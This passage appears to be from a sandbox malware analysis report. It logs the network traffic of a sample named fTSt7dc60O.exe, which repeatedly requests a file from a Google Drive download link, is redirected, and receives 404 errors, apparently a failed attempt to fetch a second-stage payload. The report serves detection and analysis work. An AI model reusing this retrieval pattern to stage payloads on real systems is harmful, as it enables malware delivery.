                                                    Jan 10, 2025 15:40:40.441245079 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441348076 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:40.441572905 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441755056 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:40.441800117 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193018913 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193099022 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193627119 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193640947 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.193891048 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.193900108 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.577877045 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.577965021 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578033924 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.578110933 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578165054 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.578231096 CET44352269172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:41.578295946 CET52269443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:41.603321075 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603368998 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:41.603518963 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603919029 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:41.603933096 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232173920 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232249022 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232703924 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232717991 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.232867956 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.232875109 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665096998 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665126085 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665172100 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665205002 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665220976 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665319920 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.665360928 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665903091 CET52270443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:42.665925980 CET44352270142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:42.784024000 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784085035 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:42.784195900 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784528017 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:42.784549952 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.485913038 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.486732960 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.487201929 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.487277985 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.488581896 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.488610029 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.489681959 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.489773035 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.490047932 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.535329103 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878143072 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878232956 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.878484011 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.902498007 CET52271443192.168.2.7172.217.18.14
                                                    Jan 10, 2025 15:40:43.902569056 CET44352271172.217.18.14192.168.2.7
                                                    Jan 10, 2025 15:40:43.911336899 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911391020 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:43.911792040 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911792040 CET52272443192.168.2.7142.250.186.161
                                                    Jan 10, 2025 15:40:43.911835909 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:44.562072039 CET44352272142.250.186.161192.168.2.7
                                                    Jan 10, 2025 15:40:44.562143087 CET52272443192.168.2.7142.250.186.161
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 10, 2025 15:39:02.633419991 CET | 53 | 64105 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 15:39:02.942725897 CET | 53899 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 15:39:02.949287891 CET | 53 | 53899 | 1.1.1.1 | 192.168.2.7
Jan 10, 2025 15:39:04.079005957 CET | 61958 | 53 | 192.168.2.7 | 1.1.1.1
Jan 10, 2025 15:39:04.086134911 CET | 53 | 61958 | 1.1.1.1 | 192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 10, 2025 15:39:02.942725897 CET | 192.168.2.7 | 1.1.1.1 | 0xeda5 | Standard query (0) | drive.google.com | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:39:04.079005957 CET | 192.168.2.7 | 1.1.1.1 | 0xaf26 | Standard query (0) | drive.usercontent.google.com | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 10, 2025 15:39:02.949287891 CET | 1.1.1.1 | 192.168.2.7 | 0xeda5 | No error (0) | drive.google.com |  | 172.217.18.14 | A (IP address) | IN (0x0001) | false
Jan 10, 2025 15:39:04.086134911 CET | 1.1.1.1 | 192.168.2.7 | 0xaf26 | No error (0) | drive.usercontent.google.com |  | 142.250.186.161 | A (IP address) | IN (0x0001) | false
                                                    • drive.google.com
                                                    • drive.usercontent.google.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 51990 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:39:03 UTC | 216 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
2025-01-10 14:39:04 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:03 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-lzONwOcMYEinkNQ6M9Rpow' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 51996 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:39:04 UTC | 258 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
2025-01-10 14:39:05 UTC | 2218 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgTwPpK8b1IEFeWcBtM_0eBX8hjW67ysALGjNpiEgOaf4Sd-FQUXvMMuSLuL1qtMlqbl
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:05 GMT
                                                    P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-GV42_E1Q4HqwbFpjWxZNyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Set-Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU; expires=Sat, 12-Jul-2025 14:39:05 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=none
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
2025-01-10 14:39:05 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="kbfDHNx1AEI0izarPi8-rA">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.7 | 52007 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:39:06 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
2025-01-10 14:39:06 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:06 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-slEN3OyqCp1vPRzcvEXeyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.7 | 52013 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:39:07 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
2025-01-10 14:39:07 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgQdeXmSp-9MKnLMvfT1s59gCYGFB0f3Fwqm-wjLqfzQLbnvgzorc74mQ0yQ45f78GkykQPKaaI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:07 GMT
                                                    Content-Security-Policy: script-src 'nonce-9kCbDWdbZ-iRhnrYLz6QJA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
2025-01-10 14:39:07 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="NYEkzjCkY0XOZfTdQr6zgw">*{margin:0;padding:0}html,code{font:15px/22px arial


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.7 | 52019 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-10 14:39:08 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
2025-01-10 14:39:08 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:08 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: script-src 'nonce--mzrAqgxBIYFxqWDiHKavw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    5  192.168.2.7  52030  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:09 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:09 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSqR202vsYFlGUT8F_e2rBkXD6pCvy7vEZ-FupVek8K6laBLp2o9oUT5YTNFdw5_dvZ
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:09 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-4gXEqPwkoSbsn-y4SjUKsw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:09 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="RNuI2FM5l-ga9LByYso6dg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    6  192.168.2.7  52036  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:10 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:10 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:10 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-BLr1gmWPJW8QMfQvs0NNNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
